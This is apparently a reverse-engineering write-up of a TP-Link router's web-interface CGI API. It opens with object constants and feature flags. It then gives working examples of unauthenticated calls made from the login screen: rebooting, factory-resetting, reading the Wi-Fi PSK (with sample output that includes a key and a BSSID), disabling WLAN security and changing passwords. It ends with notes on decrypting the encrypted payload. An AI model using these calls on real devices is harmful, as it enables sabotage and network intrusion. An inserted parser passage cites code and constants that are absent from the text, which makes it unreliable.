var LAN_DHCP_COND_SRV_POOL = "LAN_DHCP_COND_SRV_POOL"
var LAN_DHCP_COND_SRV_POOL_OPT = "LAN_DHCP_COND_SRV_POOL_OPT"
var YANDEX_DNS_POOL = "YANDEX_DNS_POOL"
var LAN_IP6_HOST_CFG = "LAN_IP6_HOST_CFG"
var LAN_IP6_INTF = "LAN_IP6_INTF"
var LAN_ETH_INTF = "LAN_ETH_INTF"
var LAN_HOSTS = "LAN_HOSTS"
var LAN_HOST_ENTRY = "LAN_HOST_ENTRY"
var LAN_WLAN = "LAN_WLAN"
var LAN_WLAN_WPS = "LAN_WLAN_WPS"
var LAN_WLAN_MACTABLEENTRY = "LAN_WLAN_MACTABLEENTRY"
var LAN_WLAN_ASSOC_DEV = "LAN_WLAN_ASSOC_DEV"
var LAN_WLAN_BSSDESC_ENTRY = "LAN_WLAN_BSSDESC_ENTRY"
var LAN_WLAN_WEPKEY = "LAN_WLAN_WEPKEY"
var LAN_WLAN_WDSBRIDGE = "LAN_WLAN_WDSBRIDGE"
var LAN_WLAN_MULTISSID = "LAN_WLAN_MULTISSID"
var LAN_WLAN_MSSIDENTRY = "LAN_WLAN_MSSIDENTRY"
var LAN_WLAN_MSSIDWEPKEY = "LAN_WLAN_MSSIDWEPKEY"
var MSSID_MACTABLEENTRY = "MSSID_MACTABLEENTRY"
var LAN_WLAN_WLBRNAME = "LAN_WLAN_WLBRNAME"
var LAN_WLAN_TASK_SCHEDULE = "LAN_WLAN_TASK_SCHEDULE"
var LAN_WLAN_QUICKSAVE = "LAN_WLAN_QUICKSAVE"
var LAN_WLAN_GUESTNET = "LAN_WLAN_GUESTNET"
var LAN_IGMP_SNOOP = "LAN_IGMP_SNOOP"
var WAN_DEV = "WAN_DEV"
var WAN_COMMON_INTF_CFG = "WAN_COMMON_INTF_CFG"
var WAN_DSL_INTF_CFG = "WAN_DSL_INTF_CFG"
var WAN_DSL_INTF_STATS = "WAN_DSL_INTF_STATS"
var WAN_DSL_INTF_STATS_TOTAL = "WAN_DSL_INTF_STATS_TOTAL"
var WAN_DSL_AUTOPVC = "WAN_DSL_AUTOPVC"
var WAN_DSL_AUTO_PVC_PAIR = "WAN_DSL_AUTO_PVC_PAIR"
var WAN_ETH_INTF = "WAN_ETH_INTF"
var WAN_ETH_INTF_STATS = "WAN_ETH_INTF_STATS"
var WAN_PON = "WAN_PON"
var WAN_EPON_INTF = "WAN_EPON_INTF"
var WAN_EPON_INTF_OAM_STATS = "WAN_EPON_INTF_OAM_STATS"
var WAN_EPON_INTF_MPCP_STATS = "WAN_EPON_INTF_MPCP_STATS"
var WAN_EPON_INTF_STATS = "WAN_EPON_INTF_STATS"
var WAN_EPON_INTF_OPTICAL_STATS = "WAN_EPON_INTF_OPTICAL_STATS"
var WAN_GPON_INTF = "WAN_GPON_INTF"
var WAN_GPON_INTF_OMCI_STATS = "WAN_GPON_INTF_OMCI_STATS"
var WAN_GPON_INTF_STATS = "WAN_GPON_INTF_STATS"
var WAN_GPON_INTF_OPTICAL_STATS = "WAN_GPON_INTF_OPTICAL_STATS"
var WAN_CONN_DEVICE = "WAN_CONN_DEVICE"
var WAN_DSL_LINK_CFG = "WAN_DSL_LINK_CFG"
var WAN_PON_LINK_CFG = "WAN_PON_LINK_CFG"
var WAN_ETH_LINK_CFG = "WAN_ETH_LINK_CFG"
var WAN_USB_3G_LINK_CFG = "WAN_USB_3G_LINK_CFG"
var USB_MODEM_PARAM = "USB_MODEM_PARAM"
var WAN_L2TP_CONN = "WAN_L2TP_CONN"
var WAN_L2TP_CONN_PORTMAPPING = "WAN_L2TP_CONN_PORTMAPPING"
var L2TP_CONN_PORTTRIGGERING = "L2TP_CONN_PORTTRIGGERING"
var WAN_L2TP_CONN_STATS = "WAN_L2TP_CONN_STATS"
var WAN_PPTP_CONN = "WAN_PPTP_CONN"
var WAN_PPTP_CONN_PORTMAPPING = "WAN_PPTP_CONN_PORTMAPPING"
var PPTP_CONN_PORTTRIGGERING = "PPTP_CONN_PORTTRIGGERING"
var WAN_PPTP_CONN_STATS = "WAN_PPTP_CONN_STATS"
var WAN_IP_CONN = "WAN_IP_CONN"
var WAN_IP_CONN_PORTMAPPING = "WAN_IP_CONN_PORTMAPPING"
var IP_CONN_PORTTRIGGERING = "IP_CONN_PORTTRIGGERING"
var WAN_PPP_CONN = "WAN_PPP_CONN"
var WAN_PPP_CONN_PORTMAPPING = "WAN_PPP_CONN_PORTMAPPING"
var PPP_CONN_PORTTRIGGERING = "PPP_CONN_PORTTRIGGERING"
var WAN_PPP_CONN_STATS = "WAN_PPP_CONN_STATS"
var STAT_CFG = "STAT_CFG"
var STAT_ENTRY = "STAT_ENTRY"
var DDOS_CFG = "DDOS_CFG"
var DOS_HOST = "DOS_HOST"
var ARP = "ARP"
var ARP_ENTRY = "ARP_ENTRY"
var ARP_BIND = "ARP_BIND"
var ARP_BIND_ENTRY = "ARP_BIND_ENTRY"
var QUEUE_MANAGEMENT = "QUEUE_MANAGEMENT"
var CLASSIFICATION = "CLASSIFICATION"
var QOS_APP = "QOS_APP"
var QOS_INTF = "QOS_INTF"
var QOS_QUEUE = "QOS_QUEUE"
var TC = "TC"
var TC_RULE = "TC_RULE"
var ALG_CFG = "ALG_CFG"
var IPTV = "IPTV"
var DSL_IPTV_CFG = "DSL_IPTV_CFG"
var ETH_IPTV_CFG = "ETH_IPTV_CFG"
var FIREWALL = "FIREWALL"
var INTERNAL_HOST = "INTERNAL_HOST"
var EXTERNAL_HOST = "EXTERNAL_HOST"
var TASK_SCHEDULE = "TASK_SCHEDULE"
var RULE = "RULE"
var URL_LIST = "URL_LIST"
var URL_CFG = "URL_CFG"
var IP6_FIREWALL = "IP6_FIREWALL"
var IP6_INTERNAL_HOST = "IP6_INTERNAL_HOST"
var IP6_EXTERNAL_HOST = "IP6_EXTERNAL_HOST"
var IP6_TASK_SCHEDULE = "IP6_TASK_SCHEDULE"
var IP6_RULE = "IP6_RULE"
var IP6_TUNNEL = "IP6_TUNNEL"
var DSLITE = "DSLITE"
var SIT_6RD = "SIT_6RD"
var SERVICES = "SERVICES"
var VOICE = "VOICE"
var XTP_VOICE_PROCESS_STS = "XTP_VOICE_PROCESS_STS"
var XTP_VOICE_PROCESS = "XTP_VOICE_PROCESS"
var VOICE_CAP = "VOICE_CAP"
var VOICE_CAP_SIP = "VOICE_CAP_SIP"
var VOICE_CAP_MGCP = "VOICE_CAP_MGCP"
var VOICE_CAP_CODECS = "VOICE_CAP_CODECS"
var VOICE_PROF = "VOICE_PROF"
var VOICE_PROF_PROVIDER = "VOICE_PROF_PROVIDER"
var VOICE_PROF_SIP = "VOICE_PROF_SIP"
var VOICE_PROF_SIP_EVTSUBSCRIBE = "VOICE_PROF_SIP_EVTSUBSCRIBE"
var VOICE_PROF_MGCP = "VOICE_PROF_MGCP"
var VOICE_PROF_RTP = "VOICE_PROF_RTP"
var VOICE_PROF_FAXT38 = "VOICE_PROF_FAXT38"
var XTP_USB_VOICEMAIL_PUBLICCFG = "XTP_USB_VOICEMAIL_PUBLICCFG"
var XTP_MULTI_ISP = "XTP_MULTI_ISP"
var XTP_MULTIISP_CODEC = "XTP_MULTIISP_CODEC"
var XTP_MULTIISP_CODEC_LIST = "XTP_MULTIISP_CODEC_LIST"
var VOICE_PROF_LINE = "VOICE_PROF_LINE"
var VOICE_PROF_LINE_SIP = "VOICE_PROF_LINE_SIP"
var VOICE_PROF_LINE_XTPUSBVM = "VOICE_PROF_LINE_XTPUSBVM"
var VOICE_PROF_LINE_CALLFEAT = "VOICE_PROF_LINE_CALLFEAT"
var VOICE_PROF_LINE_PROC = "VOICE_PROF_LINE_PROC"
var VOICE_PROF_LINE_CODEC = "VOICE_PROF_LINE_CODEC"
var VOICE_PROF_LINE_CODEC_LIST = "VOICE_PROF_LINE_CODEC_LIST"
var VOICE_PROF_LINE_STATS = "VOICE_PROF_LINE_STATS"
var XTP_FEATURE_CODE = "XTP_FEATURE_CODE"
var VOICE_PHY_INTERFACE = "VOICE_PHY_INTERFACE"
var VOICE_PHYINTERFACE_TESTS = "VOICE_PHYINTERFACE_TESTS"
var XTP_VOICE_MULTI_ISPDIALPLAN = "XTP_VOICE_MULTI_ISPDIALPLAN"
var XTP_VOICE_PSTN = "XTP_VOICE_PSTN"
var STORAGE_SERVICE = "STORAGE_SERVICE"
var CAPABLE = "CAPABLE"
var USER_ACCOUNT = "USER_ACCOUNT"
var USB_DEVICE = "USB_DEVICE"
var LOGICAL_VOLUME = "LOGICAL_VOLUME"
var FOLDER_BROWSE = "FOLDER_BROWSE"
var FOLDER_NODE = "FOLDER_NODE"
var DLNA_MEDIA_SERVER = "DLNA_MEDIA_SERVER"
var DLNA_MEDIA_SERVER_FOLDER = "DLNA_MEDIA_SERVER_FOLDER"
var SMB_SERVICE = "SMB_SERVICE"
var SMB_SERVICE_FOLDER = "SMB_SERVICE_FOLDER"
var SMB_USER_ACCESS = "SMB_USER_ACCESS"
var FTP_SERVER = "FTP_SERVER"
var FTP_SERVER_FOLDER = "FTP_SERVER_FOLDER"
var FTP_USER_ACCESS = "FTP_USER_ACCESS"
var XTP_PRINT_SERVICE = "XTP_PRINT_SERVICE"
var XTP_IGD_CALL_FIREWALL_CFG = "XTP_IGD_CALL_FIREWALL_CFG"
var XTP_IGD_SPEED_DIAL_CFG = "XTP_IGD_SPEED_DIAL_CFG"
var XTP_IGD_MULTI_ISP_DIAL_PLAN = "XTP_IGD_MULTI_ISP_DIAL_PLAN"
var XTP_IGD_MULTIISPDP_LIST = "XTP_IGD_MULTIISPDP_LIST"
var XTP_CALLLOGCFG = "XTP_CALLLOGCFG"
var IPSEC = "IPSEC"
var IPSEC_CFG = "IPSEC_CFG"
var SYS_MODE = "SYS_MODE"
var EWAN = "EWAN"
var USER_INFO = "USER_INFO"
var GPON_USER_INFO = "GPON_USER_INFO"
var GPON_AUTH_CTC = "GPON_AUTH_CTC"
var GPON_AUTH_SN = "GPON_AUTH_SN"
var GPON_AUTH_PWD = "GPON_AUTH_PWD"
var GPON_MAC_INFO = "GPON_MAC_INFO"
var GPON_FWD_RULE = "GPON_FWD_RULE"
var GPON_LOCAL_RULE_ENTRY = "GPON_LOCAL_RULE_ENTRY"
var GPON_REMOTE_RULE_ENTRY = "GPON_REMOTE_RULE_ENTRY"
var GPON_OMCI_IOT = "GPON_OMCI_IOT"
var GPON_OMCI_IOT_ENTRY = "GPON_OMCI_IOT_ENTRY"
var GPON_OMCI_ME_ATTR = "GPON_OMCI_ME_ATTR"
var CLOUD_SERVICE = "CLOUD_SERVICE"
var FW_UPGRADE_INFO = "FW_UPGRADE_INFO"
var CLOUD_USER_ACCOUNT = "CLOUD_USER_ACCOUNT"
var OWNER_INFO = "OWNER_INFO"
var CURRENT_USER_INFO = "CURRENT_USER_INFO"
var CLOUD_DDNS = "CLOUD_DDNS"
var CLOUD_DDNS_ENTRY = "CLOUD_DDNS_ENTRY"
var WAN_BLOCK = "WAN_BLOCK"
var WAN_ERROR_BLOCK = "WAN_ERROR_BLOCK"
var FW_UP_INFO_BLOCK = "FW_UP_INFO_BLOCK"
var IPPING_DIAG = "IPPING_DIAG"
var TRACEROUTE_DIAG = "TRACEROUTE_DIAG"
var SDMZ_CFG = "SDMZ_CFG"
var WEB_CFG = "WEB_CFG"
var VLAN = "VLAN"
var ISP_SERVICE = "ISP_SERVICE"
var WOL = "WOL"
var WOL_ITEM = "WOL_ITEM"
var IPV6_CFG = "IPV6_CFG"
var SYS_STATE = "SYS_STATE"
var IPV6_PASS_THROUGH = "IPV6_PASS_THROUGH"
var AUTO_REBOOT_CFG = "AUTO_REBOOT_CFG"
var CPU_MEM = "CPU_MEM"
var PRODUCE_INFO = "PRODUCE_INFO"
var MULTIMODE = "MULTIMODE"
var MULTIMODE_AP = "MULTIMODE_AP"
var AP_CONFIG_WEPKEY = "AP_CONFIG_WEPKEY"
var AP_SNMP_CFG = "AP_SNMP_CFG"
var MULTIMODE_CLIENT = "MULTIMODE_CLIENT"
var MULTIMODE_RE = "MULTIMODE_RE"
var RE_CONFIG_WEPKEY = "RE_CONFIG_WEPKEY"
var MULTIMODE_ROUTER = "MULTIMODE_ROUTER"
var ROUTER_CONFIG_WEPKEY = "ROUTER_CONFIG_WEPKEY"
var ROUTER_CONFIG_MULTISSID = "ROUTER_CONFIG_MULTISSID"
var ROUTER_CONFIG_MSSIDENTRY = "ROUTER_CONFIG_MSSIDENTRY"
var MULTIMODE_MSSID = "MULTIMODE_MSSID"
var MSSID_CONFIG_MULTISSID = "MSSID_CONFIG_MULTISSID"
var MSSID_CONFIG_MSSIDENTRY = "MSSID_CONFIG_MSSIDENTRY"
var MULTIMODE_HOTSPOT = "MULTIMODE_HOTSPOT"
var PING_WATCH_DOG = "PING_WATCH_DOG"
var LED_CONTROL = "LED_CONTROL"
var NEW_SDMZ_CFG = "NEW_SDMZ_CFG"

var INCLUDE_MULTI_LANGUAGE_Q=0
var INCLUDE_LOGIN_GDPR_ENCRYPT=1
var INCLUDE_WAN_LAN_STATUS=1
var INCLUDE_MULTIMODE_MODEM=0
var INCLUDE_MULTIMODE_RE=1
var WEB_INCLUDE_TEST=0
var WEB_INCLUDE_MULTI_EWAN=0
var WEB_INCLUDE_DST=1
var WEB_QS_CHANGEPASSWORD=1
var INCLUDE_IP6_WAN_NOT_ASSIGN_ADDR=0
var INCLUDE_UN_IPTV=0
var INCLUDE_SCHEDULE_NEW=0
var INCLUDE_HW_NAT=0
var INCLUDE_LED_CONTROL=0
var INCLUDE_MULTILANGUAGE=0
var INCLUDE_FEEDBACK=0
var INCLUDE_WOL=0
var INCLUDE_MULTILOCALCOEX=0
var INCLUDE_WEBUI_SUPPORT=1
var INCLUDE_FORCE_TIMEZONE_SELECT=0
var INCLUDE_FORCE_REGION_SELECT=0
var INCLUDE_WLAN_REGION_LIST=0
var INCLUDE_MULTIPLE_LOCALIZATION=0
var INCLUDE_SCAN_ALL_CHANNELS=0
var INCLUDE_WDS_DUALBAND_DYNSWITCH=0
var INCLUDE_LOCK_TO_AP=1

var INCLUDE_LAN_WLAN=1
var INCLUDE_VOIP
var INCLUDE_FXS_NUM
var INCLUDE_CALLLOG
var INCLUDE_USB_VOICEMAIL
var INCLUDE_PSTN
var INCLUDE_PSTN_GATEWAY
var INCLUDE_PSTN_LIFELINE
var INCLUDE_BRIDGING=1
var INCLUDE_IGMP=1
var INCLUDE_ETHERNET_WAN=1
var INCLUDE_WAN_LAN_STATUS=1
var INCLUDE_SNMP=1
var INCLUDE_RIP
var INCLUDE_DDNS_PH
var INCLUDE_LAN_WLAN_MSSID=1
var INCLUDE_LAN_WLAN_WDS=1
var INCLUDE_IPTV
var INCLUDE_CWMP
var INCLUDE_DYNDNS=1
var INCLUDE_USB
var INCLUDE_USB_STORAGE
var INCLUDE_USB_MEDIA_SERVER
var INCLUDE_USB_SAMBA_SERVER
var INCLUDE_USB_FTP_SERVER
var INCLUDE_USB_OVER_IP
var INCLUDE_ADSLWAN
var INCLUDE_AUTO_PVC
var INCLUDE_IPV6=1
var INCLUDE_IPV6_SLAAC=1
var INCLUDE_IPV6_AUTO=1
var INCLUDE_SPECIAL_DIAL_MODE
var INCLUDE_WAN_MODE=1
var INCLUDE_IPSEC
var INCLUDE_NOIPDNS=1
var INCLUDE_ALG_H323=1
var INCLUDE_ALG_SIP=1
var INCLUDE_PON_ETH_WAN
var INCLUDE_EPON_INFO
var INCLUDE_GPON_INFO
var INCLUDE_QOS
var INCLUDE_E8_APP
var INCLUDE_TFC_PERU
var INCLUDE_USB_3G_DONGLE
var INCLUDE_LAN_WLAN_SCHEDULE=1
var INCLUDE_ROUTE_BINDING
var INCLUDE_LAN_WLAN_GUESTNETWORK=1
var INCLUDE_LAN_WLAN_DUALBAND
var INCLUDE_LAN_WLAN_HWSWITCH
var INCLUDE_LAN_WLAN_AC=1
var INCLUDE_LAN_WLAN_WDS_DETECT
var INCLUDE_L2TP=1
var INCLUDE_PPTP=1
var INCLUDE_IPV6_MLD=1
var INCLUDE_ACL
var INCLUDE_ACL_ADVANCE
var INCLUDE_DUAL_ACCESS=1
var INCLUDE_WAN_TYPE_DETECT=1
var INCLUDE_BPA=1
var INCLUDE_CMXDNS=1
var INCLUDE_IPPING_DIAG=1
var INCLUDE_TRACEROUTE_DIAG=1
var INCLUDE_LAN_WLAN_QUICKSAVE
var INCLUDE_IGMP_FORCEVERSION=1
var INCLUDE_PORTABLE_APP=1
var DEFAULT_NO_SPEC=1
var INCLUDE_MEXICO_SPEC
var INCLUDE_CANADA_SPEC
var INCLUDE_JAPAN_SPEC
var INCLUDE_KOREA_SPEC
var INCLUDE_PL_SPEC
var INCLUDE_BR_SPEC
var INCLUDE_ROMANIA_SPEC
var INCLUDE_RUSSIA_SPEC
var INCLUDE_US_SPEC
var INCLUDE_VN_SPEC
var INCLUDE_VIETNAM_FPT
var INCLUDE_TW_SPEC
var INCLUDE_ES_SPEC
var INCLUDE_X_TP_VLAN=1
var INCLUDE_FORBID_WAN_PING=1
var INCLUDE_SMART_DHCP=1
var INCLUDE_MIC=1
var INCLUDE_IPV6_PASS_THROUGH
var INCLUDE_AUTOREBOOT=1
var INCLUDE_CPUMEM_INFO
var INCLUDE_MULTIMODE_RE=1
var INCLUDE_MULTIMODE_AP=1
var INCLUDE_MULTIMODE_CLIENT=1
var INCLUDE_MULTIMODE=1
var INCLUDE_PING_WATCHDOG=1
var INCLUDE_MULTIMODE_ROUTER=1
var INCLUDE_MULTIMODE_MSSID
var INCLUDE_YANDEX_DNS
var INCLUDE_LED_CONTROL
var INCLUDE_MULTILANGUAGE
var INCLUDE_FORCE_TIMEZONE_SELECT
var INCLUDE_FORCE_REGION_SELECT
var INCLUDE_MULTIMODE_HOTSPOT=1
var INCLUDE_WLAN_REGION_LIST
var INCLUDE_FBWIFI
var INCLUDE_CLOUD
var INCLUDE_WANIP_BINDING
var INCLUDE_HTTPS_SSL=1
var INCLUDE_LAN_AP_GATEWAY=1
var INCLUDE_US_FOR_KR_SPEC
var INCLUDE_WOL
var INCLUDE_NEW_SDMZ
var INCLUDE_DMZ
var INCLUDE_SDMZ
Note: While debugging CGI calls, the server returns a numeric error code. A successful request returns $.ret=0. The meaning of the other return codes can easily be resolved using err.js.
Note: The JS files mentioned up to this point (lib.js, oid_str.js, err.js) are all accessible without any authorisation in the webserver's /js directory and define the basic functionality of the web interface.
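As an added example (not part of the original page and not TP-Link's lib.js), the following stand-alone JavaScript parser implements the response format that the resolve() helper inside $.exe above walks line by line: a [stack]index header opens a new instance, key=value lines fill its attributes (only the first = splits, so values containing = survive, as attr.slice(1).join('=') does in lib.js), and a closing [error]code line carries the numeric result code, 0 meaning success as the note above states. The function names and the sample responses are constructed for this illustration; the attribute names are taken from the LAN_WLAN object on this page and the error code from the ERR_HTTP_ERR_CGI_INVALID_ANSI constant listed here. The second helper reports which attributes commonly treated as secrets are present with a non-empty value in a captured response, which is how one would audit what the older, cleartext firmware actually puts on the wire.

```javascript
// Added example: stand-alone parser for the TP-Link CGI response format that
// lib.js's resolve() consumes. Not vendor code; names are this example's own.
//
//   [a,b,c,d,e,f]<index>   header: opens an instance; <index> is the position
//                          of the $.act() call that this instance answers
//   key=value              attribute of the current instance
//   [error]<code>          closes the response; 0 means success
function parseCgiResponse(text) {
  var result = { instances: [], error: null };
  var current = null;
  var lines = text.split("\n");
  for (var i = 0; i < lines.length; i++) {
    var line = lines[i].replace(/\r$/, "");
    if (line === "") continue;
    if (line.charAt(0) === "[") {
      var n = line.indexOf("]");
      if (n < 0) throw new Error("malformed header line: " + line);
      var stack = line.substr(1, n - 1);
      var num = parseInt(line.substr(n + 1), 10);
      if (stack === "error") {
        // [error]N terminates the response; keep whatever was parsed so far
        result.error = isNaN(num) ? -1 : num;
        break;
      }
      current = { __stack: stack, __index: isNaN(num) ? 0 : num, attrs: {} };
      result.instances.push(current);
    } else {
      if (current === null) throw new Error("attribute before any header: " + line);
      // Split only at the first '=' so that values containing '=' survive
      var eq = line.indexOf("=");
      var key = eq < 0 ? line : line.substr(0, eq);
      var value = eq < 0 ? "" : line.substr(eq + 1);
      current.attrs[key] = value;
    }
  }
  return result;
}

// Lists the attributes from `names` that appear with a non-empty value in any
// instance of a parsed response: which secrets actually left the device?
function auditSensitiveAttributes(parsed, names) {
  var hits = [];
  parsed.instances.forEach(function (inst) {
    names.forEach(function (name) {
      if (Object.prototype.hasOwnProperty.call(inst.attrs, name) && inst.attrs[name] !== "") {
        hits.push({ stack: inst.__stack, name: name });
      }
    });
  });
  return hits;
}

// Constructed sample response (all values invented), shaped like an
// ACT_GL LAN_WLAN answer: two radio instances, then [error]0.
var SAMPLE_RESPONSE =
  "[1,1,0,0,0,0]0\n" +
  "SSID=Example_2G\n" +
  "X_TP_PreSharedKey=example-psk-1\n" +
  "X_TP_RadiusServerPassword=\n" +
  "[1,2,0,0,0,0]0\n" +
  "SSID=Example_5G\n" +
  "X_TP_PreSharedKey=k=v=w\n" +
  "X_TP_RadiusServerPassword=\n" +
  "[error]0\n";

// Constructed failure response: only the error line, using the
// ERR_HTTP_ERR_CGI_INVALID_ANSI code (71017) defined in lib.js.
var SAMPLE_ERROR_RESPONSE = "[error]71017\n";

var parsed = parseCgiResponse(SAMPLE_RESPONSE);
console.log(JSON.stringify(parsed, null, 2));
console.log(auditSensitiveAttributes(parsed, ["X_TP_PreSharedKey", "X_TP_RadiusServerPassword"]));
console.log("error code:", parseCgiResponse(SAMPLE_ERROR_RESPONSE).error);
```

Feed it the body of a captured /cgi response (older firmware, where the body is plain text) and the audit list tells you per radio instance which secret-bearing attributes were transmitted; an [error] line with a non-zero code is preserved in the result instead of being silently dropped.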
The easiest way to get started is to learn from examples, and there are plenty of them. Most can be found by analysing the commands embedded in the web pages. If the /web directory has already been acquired and is available locally, a simple command (grep -rnw './web' -e '$.act') reveals almost 2000 examples spread over all documents. The other option is to use the browser's developer tools: choose the element-selection tool (macOS: ⇧+⌘+C) and click any button. All forms on the web page have onclick="functionName()" events. Then type functionName without brackets into the browser console, press enter and double-click the result; this takes you straight to the file containing the function in question. I explain this only because the page uses multiple iframes, which makes a manual search a bit harder. Below is a very simple example function, which served as my entry point and is also used in the Examples section that follows.
function doRestart()
{
	if(confirm(c_str.creboot))
	{
		$.guage(["<span class='T T_rebooting'>"+s_str.rebooting+"</span>", "<span class='T T_wait_reboot'>"+s_str.wait_reboot+"</span>",], 100, $.guageInterval, function(){window.parent.$.refresh();});
		$.act(ACT_OP, ACT_OP_REBOOT);
		$.exe(true);
	}
}
Note: On the older firmware, ALL information is transmitted in cleartext, unencrypted, over the network. The newer firmware encrypts the payload but still uses an unencrypted HTTP connection.

Examples

ⓘ Unauthorized Reboot that works from the login screen
// Firmware: 170828
$.act(ACT_OP, ACT_OP_REBOOT); $.exe();
ⓘ Unauthorized Factory Reset that works from the login screen
// Firmware 170828
$.act(ACT_OP, ACT_OP_FACTORY_RESET); $.act(ACT_OP, ACT_OP_REBOOT); $.exe();
Note: A factory reset also needs a reboot to become active.
ⓘ Get all LAN_WLAN object attributes
// Firmware: 170828
$.act(ACT_GL, LAN_WLAN); $.exe();
ⓘ Example LAN_WLAN object attributes
[1,1,0,0,0,0]0
__syncApStatus=0
__apLastStatus=3
__hwWifiStatus=0
enable=1
status=Up
name=wlan0
BSSID=74:DA:88:FC:C3:AE
channel=3
autoChannelEnable=1
X_TP_PreSSID=TP-Link
SSID=TP-Link_C3AE
beaconType=11i
MACAddressControlEnabled=0
X_TP_MACAddressControlRule=deny
X_TP_MACTableSize=0
X_TP_Configuration_Modified=0
X_TP_Band=2.4GHz
X_TP_Bandwidth=Auto
standard=n
WEPKeyIndex=1
WEPEncryptionLevel=Disabled,40-bits,104-bits
basicEncryptionModes=None
basicAuthenticationMode=None
WPAEncryptionModes=TKIPandAESEncryption
WPAAuthenticationMode=PSKAuthentication
IEEE11iEncryptionModes=AESEncryption
IEEE11iAuthenticationMode=PSKAuthentication
X_TP_PreSharedKey=09960466
X_TP_GroupKeyUpdateInterval=0
possibleChannels=
basicDataTransmitRates=2,11,6,18,24,48,54,60,90,120,150,90,120,240,450,60,120,240,480,
operationalDataTransmitRates=
possibleDataTransmitRates=5.5,11,12,24,36,135,150,30,60,240,270,300,45,450,60,120,240,480,
SSIDAdvertisementEnabled=1
transmitPowerSupported=100,50,20
transmitPower=100
regulatoryDomain=DE 
deviceOperationMode=InfrastructureAccessPoint
X_TP_RadiusServerIP=
X_TP_RadiusServerPort=1812
X_TP_RadiusServerPassword=
WMMEnable=1
X_TP_BeaconInterval=100
X_TP_RTSThreshold=2346
X_TP_FragmentThreshold=2346
X_TP_DTIMFrequency=1
X_TP_IsolateClients=0
X_TP_ShortGIEnable=1
totalAssociations=64
maxStaNum=32
X_TP_ShowRegionSelectionOnWeb=0
[1,2,0,0,0,0]0
__syncApStatus=0
__apLastStatus=3
__hwWifiStatus=0
enable=0
status=Disabled
name=wlan5
BSSID=74:DA:88:FC:C3:AD
channel=40
autoChannelEnable=1
X_TP_PreSSID=TP-Link
SSID=TP-Link_C3AE_5G
beaconType=11i
MACAddressControlEnabled=0
X_TP_MACAddressControlRule=deny
X_TP_MACTableSize=0
X_TP_Configuration_Modified=0
X_TP_Band=5GHz
X_TP_Bandwidth=Auto
standard=ac
WEPKeyIndex=1
WEPEncryptionLevel=Disabled,40-bits,104-bits
basicEncryptionModes=None
basicAuthenticationMode=None
WPAEncryptionModes=TKIPandAESEncryption
WPAAuthenticationMode=PSKAuthentication
IEEE11iEncryptionModes=AESEncryption
IEEE11iAuthenticationMode=PSKAuthentication
X_TP_PreSharedKey=09960466
X_TP_GroupKeyUpdateInterval=0
possibleChannels=
basicDataTransmitRates=
operationalDataTransmitRates=
possibleDataTransmitRates=
SSIDAdvertisementEnabled=1
transmitPowerSupported=100,50,20
transmitPower=100
regulatoryDomain=DE 
deviceOperationMode=InfrastructureAccessPoint
X_TP_RadiusServerIP=
X_TP_RadiusServerPort=1812
X_TP_RadiusServerPassword=
WMMEnable=1
X_TP_BeaconInterval=100
X_TP_RTSThreshold=2346
X_TP_FragmentThreshold=2346
X_TP_DTIMFrequency=1
X_TP_IsolateClients=0
X_TP_ShortGIEnable=1
totalAssociations=64
maxStaNum=32
X_TP_ShowRegionSelectionOnWeb=0
[error]0
ⓘ Get SSID and PSK
// Firmware: 170828
$.act(ACT_GL,LAN_WLAN,null,null,["SSID", "X_TP_PreSharedKey"]); $.exe();

// Example Response
[1,1,0,0,0,0]0
SSID=TP-Link_00FC
X_TP_PreSharedKey=37490720
[1,2,0,0,0,0]0
SSID=TP-Link_00FC_5G
X_TP_PreSharedKey=37490720
[error]0
ⓘ Disable WLAN security
// Firmware: 170828
var wlanList=$.act(ACT_GL,LAN_WLAN,null,null,["name", "SSID", "Enable", "X_TP_Configuration_Modified", "beaconType", "Standard", "WEPEncryptionLevel", "WEPKeyIndex", "BasicEncryptionModes", "BasicAuthenticationMode", "WPAEncryptionModes", "WPAAuthenticationMode", "IEEE11iEncryptionModes", "IEEE11iAuthenticationMode", "X_TP_PreSharedKey", "X_TP_GroupKeyUpdateInterval", "X_TP_RadiusServerIP", "X_TP_RadiusServerPort", "X_TP_RadiusServerPassword"]);
$.exe();
wlanObj=wlanList[0];
$.act(ACT_SET,LAN_WLAN,wlanObj.__stack,null,["BeaconType=Basic", "BasicEncryptionModes=None", "BasicAuthenticationMode=None"]); $.exe();
ⓘ Change both WLAN radio passwords
// Firmware: 170828
let password = "1234567890";
var wlanList=$.act(ACT_GL,LAN_WLAN,null,null,["name", "SSID", "Enable", "X_TP_Configuration_Modified", "beaconType", "Standard", "WEPEncryptionLevel", "WEPKeyIndex", "BasicEncryptionModes", "BasicAuthenticationMode", "WPAEncryptionModes", "WPAAuthenticationMode", "IEEE11iEncryptionModes", "IEEE11iAuthenticationMode", "X_TP_PreSharedKey", "X_TP_GroupKeyUpdateInterval", "X_TP_RadiusServerIP", "X_TP_RadiusServerPort", "X_TP_RadiusServerPassword"]);
$.exe();
$.act(ACT_SET,LAN_WLAN,wlanList[0].__stack,null,["BeaconType=11i", "IEEE11iAuthenticationMode=PSKAuthentication", "IEEE11iEncryptionModes=AESEncryption", "X_TP_PreSharedKey="+password,"X_TP_GroupKeyUpdateInterval=0"]);
$.act(ACT_SET,LAN_WLAN,wlanList[1].__stack,null,["BeaconType=11i", "IEEE11iAuthenticationMode=PSKAuthentication", "IEEE11iEncryptionModes=AESEncryption", "X_TP_PreSharedKey="+password,"X_TP_GroupKeyUpdateInterval=0"]);
$.exe();
Note: wlanList holds one entry per radio (index 0 = 2.4 GHz, index 1 = 5 GHz); they correspond to the [1,1,...] and [1,2,...] stacks in the response above.

Payload Encryption

The newer firmware versions send an AES-encrypted payload to the web server via the /cgi_gdpr URL instead of /cgi for most calls. To analyse the server's responses, the payload has to be decrypted. While debugging, this can be done either with the $.Iencryptor instance used for encryption or by overriding $.io(), which logs the response after decryption. /cgi/getParm returns the RSA public key (nn, ee) and the seq value that the client-side encryptor is initialised with (see below), so attackers may be able to forge the encryption key with its help. Additionally, the modified version of the $.io() function prevents the page from reloading while testing unauthorized CGI calls from the login screen.
ⓘ Example AES Decryption using $.Iencryptor
$.Iencryptor.AESDecrypt("QCN4Rv6QexPOxOxIs7adng==");

// var encryptor = $.encrypt.encryptManager.genEncryptor(); // create the encryptor
// encryptor.genAESKey(); // generate the AES key
// encryptor.setRSAKey("nn", "ee"); // set the RSA key
// encryptor.setSeq("123");   // set seq
// encryptor.setHash("用户名", "密码"); // set username and password
//
//
// // once all of the above is set, encryption can be performed
// encryptor.AESEncrypt(data);
//
// // returned object
// // {
// //     data: "encrypted data",
// //     sign: "signature"
// // }
//
//
